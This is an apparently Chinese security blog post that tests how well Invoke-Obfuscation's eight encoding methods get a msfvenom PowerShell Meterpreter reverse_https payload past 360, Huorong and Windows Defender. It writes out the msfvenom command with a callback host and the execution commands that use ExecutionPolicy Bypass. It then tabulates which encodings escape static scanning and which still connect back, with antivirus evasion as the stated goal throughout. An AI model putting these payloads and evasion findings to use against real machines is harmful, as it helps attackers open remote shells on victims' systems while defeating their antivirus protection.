Invoke-Obfuscation混淆免杀过360和火绒
微信公众号:乌鸦安全
扫取二维码获取更多信息!
更新时间:2021-05-31
Invoke-Obfuscation
下载地址:https://github.com/danielbohannon/Invoke-Obfuscation
参考文档 https://blog.csdn.net/weixin_44216796/article/details/112723993
先说下结果:
Invoke-Obfuscation
的Encoding
部分方法混淆可以过360和火绒,但是过不了Windows Defender
1. 模块使用
导入模块
Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1
这里注意,一定要写上完整路径,不然会报错
加载模块
Invoke-Obfuscation
支持的加密方法:
TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式
2. msfvenom下msf上线
首先用msfvenom
生成一个ps1文件
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1
然后设置监听:
然后回到win10
2.1 360
直接在有360的环境下进行执行(这里不做云查杀和杀毒的操作)
PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1
上线成功。
这里来一次查杀,首先使用按位置查杀
报毒,直接在这个位置关闭,不处理
再运行一次,此时360提示有毒。
2.2 Windows defender
复制到Windows sever2019
下,Windows Defender
直接杀掉
2.3 火绒
关掉Windows Defender
直接使用火绒
扫描,没扫描到。
上线试试:
直接就上线了!!!
2.4 总结
因此在此可以进行如下总结:
msfvenom
最新版(2021-05-28安装)生成powershell
攻击脚本在静态下的查杀效果:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
ps:以上环境都联网状态下
同样
msfvenom
最新版(2021-05-28安装)生成powershell
攻击脚本在动态执行上线的查杀效果:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
ps:以上环境都联网,且均在cmd
中执行-ExecutionPolicy Bypass
来绕过执行安全策略进行上线。
这里可以看到,360在第一次并不拦截,而且还可以上线,这可能由于我用的是虚拟机,如果是实体机的话,应该会被杀。
3. 混淆大法
设置需要混淆的木马文件路径
set scriptpath C:\0_poweshell\msf-crow.ps1
4. 第一种混淆 1
encoding选择第一种方法混淆1
将文件输出的out 1.ps1
文件路径:
C:\0_poweshell\Invoke-Obfuscation-master\1.ps1
攻击机开启监听模式:
上线测试:
4.1 360
在360
环境下直接运行(生成之后没有杀毒扫描)
PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1
这里是在cmd
命令行下执行PowerShell
命令的
-ExecutionPolicy Bypass
:绕过执行安全策略,在默认情况下,PowerShell
的安全策略规定了PowerShell
不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShel
l脚本时都要使用这个参数。(参考:https://blog.csdn.net/Eastmount/article/details/115503946)
360下上线成功
但使用360云查杀之后显示报毒:
4.2 windows Defender
windows Defender
直接静态被杀
4.3 火绒
火绒,静态扫描报毒
动态上线失败
4.4 总结
静态查杀
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
❌ |
全挂。。。
5. 第2种混淆 2
这里先静态测试下:
5.1 火绒
火绒:
5.2 360
360云查杀
5.3 Windows Defender
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
✔️ |
动态上线能力:
PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1
火绒:
静态查杀,动态上线失败
windf:
静态查杀正常,动态上线失败
360:
动态上线失败,而且清除了木马,因此这里360也是静动均查杀了木马
此时对其进行重新调整:
5.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
❌ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
❌ |
6. 第三种方法 3
6.1 360
动态上线测试
再次云查杀
6.2 火绒
6.3 windows Defender
静态正常
动态:失败
6.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
❌ |
未测 |
❌ |
7. 第四种方法 4
7.1 360
上线测试
7.2 火绒
动态正常
7.3 windows Defender
静态过了
动态上线失败
7.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
8. 第五种方法 5
现在验证下各种查杀
8.1 360
动态上线
8.2 火绒
8.3 window defender
都报错,那再生成一次,这次报错更多了
8.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
运行报错 |
未测 |
windows server 2019 64位 |
运行报错 |
未测 |
运行报错 |
9. 第6种方法 6
9.1 360
动态上线测试,上线正常
再杀一次,还是正常
9.2 火绒
9.3 window defender
9.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
10. 第七种方法 7
10.1 360
动态上线测试,win10下的powershell崩掉,应该是由于字符太大的原因
10.2 火绒
动态上线测试:
10.3 window defender
由于脚本无法在我的win10下测试,这里到winserver2019
上进行测试,开启Windows defender
防护
上线失败
10.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
11. 第八种方法 8
11.1 360
11.2 火绒
11.3 window defender
11.4 总结
静态查杀能力:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
✔️ |
动态上线:
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
✔️ |
未测 |
❌ |
12. 总结
12.1 版本问题
环境:
Windows10 x64
+ 360
winserver2019 x64
+ 火绒
windows Defender
最新版本
12.2 查杀问题
火绒
,360
,Windows defender
均采用联网查杀,其中360
采用云杀毒模式
12.3 bypass av能力总结
msfvenom
生成powershell
攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果:
msfvenom最新版(2021-05-28安装) |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
msfvenom最新版(2021-05-28安装) |
未测 |
❌ |
未测 |
windows server 2019 64位 |
msfvenom最新版(2021-05-28安装) |
✔️ |
未测 |
❌ |
方法1: ASCII |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法1: ASCII |
未测 |
❌ |
未测 |
windows server 2019 64位 |
方法1: ASCII |
❌ |
未测 |
❌ |
方法2: Hex |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法2: Hex |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法2: Hex |
❌ |
未测 |
✔️ |
方法3: Octal |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法3: Octal |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法3: Octal |
❌ |
未测 |
✔️ |
方法4: Binary |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法4: Binary |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法4: Binary |
✔️ |
未测 |
✔️ |
方法5: SecureString (AES) |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法5: SecureString (AES) |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法5: SecureString (AES) |
✔️ |
未测 |
✔️ |
方法6: BXOR |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法6: BXOR |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法6: BXOR |
✔️ |
未测 |
❌ |
方法7: Special Characters |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法7: Special Characters |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法7: Special Characters |
✔️ |
未测 |
✔️ |
方法8: Whitespace |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法8: Whitespace |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法8: Whitespace |
✔️ |
未测 |
✔️ |
ps:以上环境都联网状态下,360采用云查杀
同样
msfvenom
生成powershell
攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的动态上线查杀效果:
msfvenom最新版(2021-05-28安装) |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
msfvenom最新版(2021-05-28安装) |
未测 |
❌ |
未测 |
windows server 2019 64位 |
msfvenom最新版(2021-05-28安装) |
✔️ |
未测 |
❌ |
方法1: ASCII |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法1: ASCII |
未测 |
❌ |
未测 |
windows server 2019 64位 |
方法1: ASCII |
❌ |
未测 |
❌ |
方法2: Hex |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法2: Hex |
未测 |
❌ |
未测 |
windows server 2019 64位 |
方法2: Hex |
❌ |
未测 |
❌ |
方法3: Octal |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法3: Octal |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法3: Octal |
❌ |
未测 |
❌ |
方法4: Binary |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法4: Binary |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法4: Binary |
✔️ |
未测 |
❌ |
方法5: SecureString (AES) |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法5: SecureString (AES) |
未测 |
运行报错 |
未测 |
windows server 2019 64位 |
方法5: SecureString (AES) |
运行报错 |
未测 |
运行报错 |
方法6: BXOR |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法6: BXOR |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法6: BXOR |
✔️ |
未测 |
❌ |
方法7: Special Characters |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法7: Special Characters |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法7: Special Characters |
✔️ |
未测 |
❌ |
方法8: Whitespace |
火绒 |
360 |
Windows Defender |
|
windows 10 64位 |
方法8: Whitespace |
未测 |
✔️ |
未测 |
windows server 2019 64位 |
方法8: Whitespace |
✔️ |
未测 |
❌ |
ps:以上环境都联网状态下,360采用云查杀
原文地址:https://mp.weixin.qq.com/s/Nvog8OJZXvPKMqJ8MkwNAQ
Invoke-Obfuscation混淆免杀过360和火绒相关推荐
- 红队培训班作业 | 免杀过360和火绒 四种方法大对比
文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
- mimikatz免杀过360和火绒
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网.也可以通过明文密码或者hash值 ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- MSF(3)——apk和exe的加马(过360、火绒)
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 文章目录 前文链接 工具地址 shielden 520apkhook exe 加马 shellter附加 安装 软件准备 添加后门 杀软测试 加 ...
- 论中国的软件,360和火绒那个更流氓
一起本人一直用360安全卫士,一直觉得360就是中国最大的流氓软件.没有质疑的那种.后来发现搜狗输入法,百度管家,腾讯的那个管家.金山.都是特么的流氓.下载一个,出现一家全家桶,就不就是我和你相亲,请 ...
- Pythonshellcode编码+混淆免杀
Python免杀shellcode加载器 一.工具介绍 免杀方式: msfvenom生成raw格式的shellcode–>base64–>XOR–>AES, 将python代码缩小并 ...
- 网络安全进阶篇之免杀(十四章-9)MSF加密壳免杀过360
文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用MSF生成木马并监听 3.2 免杀过程 3.3 测试 一. 概念 1.1 36 ...
- 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
- Shellcode免杀,过360、火绒、windows-Defender
shellcode简介 Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代 ...
最新文章
- Linux运维笔记-文档总结-NFS文件共享(网络文件系统)
- 用VC6.0遇到的一个问题
- 第四范式陈雨强获评首届世界人工智能大会云帆奖 | 2020WAIC
- SharedPreferences基础
- centos 7.2 mysql 允许_CentOS 7.2 mysql-5.7.17 审计插件安装、开启与设定
- hdu 1257最少拦截系统(贪心)
- project euler Problem 52
- 单元测试工具 unitils
- mes系统和plc通讯案例_「MES系统 | 应用案例」奥松电子云MES系统项目启动大会顺利召开...
- 归并算法(Java实现)
- zblog自动采集伪原创发布
- Python 树表查找_千树万树梨花开,忽如一夜春风来(二叉排序树、平衡二叉树)
- 获取QQ音乐排行榜数据
- 查找单词出现次数(功能加强)
- 计算机网络大学宿舍组网方案设计,学生公寓组网方案推荐 精品推荐
- k8s学习-深入理解Pod对象
- 数据库 “投毒”修复方案
- STGNN(www 2020)论文总结
- 科罗拉多矿业大学计算机科学专业,科罗拉多矿业大学专业设置情况_有哪些专业...
- 激活函数、损失函数和优化函数的比较
热门文章
- 激光雷达的现状--激光雷达为何蹿红
- android 10 gsi,【刷机教程】荣耀10 EMUI9刷原生Treble AOSP9 GSI镜像的步骤
- 《首先,打破一切常规》读后感
- 函数 内置函数 动态数组 字符
- 使用python画出五角星
- SSH 互信配置(ssh-keygen,ssh-copy-id,known_hosts)
- C++开发人员必备:86本C++教程电子书下载
- 持续集成与持续部署(六)02-CircleCI——CircleCI配置Node.js应用之.circleciconfig.yml配置文件 deploy.sh文件内容
- 淘宝登录取Cookie分析
- 【iOS】APP IM聊天框架的设计(基于第三方SDK)